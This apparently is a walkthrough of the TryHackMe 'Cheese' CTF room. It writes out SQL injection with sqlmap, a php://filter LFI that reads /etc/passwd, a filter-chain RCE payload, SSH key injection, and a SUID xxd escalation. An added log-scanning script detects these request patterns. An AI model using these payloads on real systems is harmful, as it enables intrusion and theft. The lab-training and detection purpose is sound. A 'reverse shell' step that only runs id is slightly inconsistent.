
Tryhackme Cheese Walkthrough - Pentest Lab Notes

CheeseCTF Writeup - TryHackMe

Difficulty: Medium-High

This is a write-up for the CheeseCTF room on TryHackMe, which involves exploiting a vulnerable web application to escalate privileges and capture the user and root flags.


Table of Contents

  • Reconnaissance
  • Foothold
  • Privilege Escalation
  • Root Flag

Reconnaissance

Initial Scan

We start by scanning the target with Nmap to discover any open ports:

nmap -sC -sV -p- 10.10.145.132

We find a website with a login form. After attempting manual SQL injection, we save the login request to a file and feed it to sqlmap for further testing:

sqlmap -r login

sqlmap identifies a vulnerability in the username parameter and suggests MySQL as the back-end DBMS. We attempt an injection and receive a redirect to a hidden page:

http://10.10.145.132/secret-script.php?file=supersecretadminpanel.html

After further exploration, we notice that the site is vulnerable to Local File Inclusion (LFI) via the php://filter wrapper.

Exploit LFI

We test the LFI vulnerability by including the /etc/passwd file:

http://10.10.145.132/secret-script.php?file=php://filter/resource=../../../etc/passwd

This reveals a list of users, including comte, which we target for further enumeration.

Foothold

Exploiting LFI to RCE

By chaining multiple PHP filters, we craft a payload that executes PHP code remotely on the server:

python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

We use the generated payload to trigger PHP code execution via the LFI:

http://10.10.145.132/secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.base64-decode/resource=php://temp

This confirms we can run arbitrary PHP code on the server.
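As an added defensive example (not part of the original writeup), the following Python script scans constructed Apache access-log lines for the request patterns seen above: a php:// wrapper, directory traversal, and stacked convert.* filters inside a query parameter. The log lines and the script are assumptions written for this note, not captured traffic from the room.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined format, modelled on the request
# shapes described in the writeup (not real captured traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /secret-script.php?file=supersecretadminpanel.html HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /secret-script.php?file=php://filter/resource=../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /secret-script.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp HTTP/1.1" 200 128
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(target):
    """Return indicator names (param:indicator) found in one request target."""
    indicators = []
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        for raw in values:
            # parse_qs already decoded once; decode again to catch double-encoding
            value = unquote(raw).lower()
            if '../' in value:
                indicators.append(f'{name}:traversal')
            if value.startswith('php://'):
                indicators.append(f'{name}:php-wrapper')
            # Two or more stacked convert.* filters is the hallmark of a
            # wrapper-based filter chain rather than a plain file read
            if value.count('convert.') >= 2:
                indicators.append(f'{name}:filter-chain')
    return indicators


def scan_access_log(text):
    """Yield (client ip, request target, indicators) for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        found = classify_request(m['target'])
        if found:
            hits.append((m['ip'], m['target'], found))
    return hits


if __name__ == '__main__':
    for ip, target, found in scan_access_log(SAMPLE_LOG):
        print(ip, ', '.join(found), target)
```

The first and last sample lines produce no finding; the two wrapper requests are flagged with the parameter name so an analyst can see which input carried the payload.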

Gaining Access

We then use a reverse shell payload to gain access as the www-data user:

http://10.10.145.132/secret-script.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

We receive the shell output confirming we are logged in as www-data:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next, we inspect the comte user’s home directory and find an authorized_keys file inside the .ssh folder, where we can add our public SSH key.

SSH Key Injection

We generate an SSH key pair, then add the public key to the authorized_keys file:

ssh-keygen -t rsa
chmod 600 temp_id_rsa
cat temp_id_rsa.pub
echo "<public_key>" >> authorized_keys

After doing so, we can SSH into the comte user’s account and retrieve the user flag:

ssh -i temp_id_rsa comte@10.10.145.132

User flag

cat user.txt
THM{9f2c**REDACTED**b17a}

Privilege Escalation

Sudo Privileges

As the comte user, we check for available sudo privileges:

sudo -l

We discover that comte can run several systemctl commands without a password:

(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer

This indicates that the user can manipulate a systemd timer called exploit.timer. We check the system for any exploit.service files:

cat /etc/systemd/system/*.service

We find that the exploit.service copies the xxd binary to the /opt directory and sets the SUID bit, allowing anyone to execute it with root privileges.

Fixing the Exploit Timer

The timer file /etc/systemd/system/exploit.timer is misconfigured with an empty OnBootSec value. We modify it to trigger immediately upon activation:

sudo nano /etc/systemd/system/exploit.timer

We set OnBootSec and OnUnitActiveSec to 0 for immediate execution:

[Unit]
Description=Exploit Timer

[Timer]
OnUnitActiveSec=0
OnBootSec=0

[Install]
WantedBy=timers.target

Triggering the Exploit

We start the timer:

sudo systemctl start exploit.timer

This triggers the associated exploit.service, which places the xxd binary in /opt with SUID. We use xxd to read the root.txt flag:

/opt/xxd "/root/root.txt" | xxd -r
THM{dca75**REDACTED**167c}

Root Flag

Once we gain root access, we are able to retrieve the root flag located in /root/root.txt:

cat /root/root.txt
THM{dca75**REDACTED**167c}

Conclusion

This CTF involved several vulnerabilities, including SQL injection, Local File Inclusion (LFI), Remote Code Execution (RCE), and privilege escalation through systemd timers and SUID binaries. Each step required a careful combination of techniques to gain access to both the user and root flags.

Tools Used

nmap: Network scanning

sqlmap: Automated SQL injection

php_filter_chain_generator: LFI to RCE exploitation

ssh-keygen: SSH key generation

systemctl: Interacting with systemd services

xxd: File inspection with SUID privilege escalation

This post is licensed under CC BY 4.0 by the author.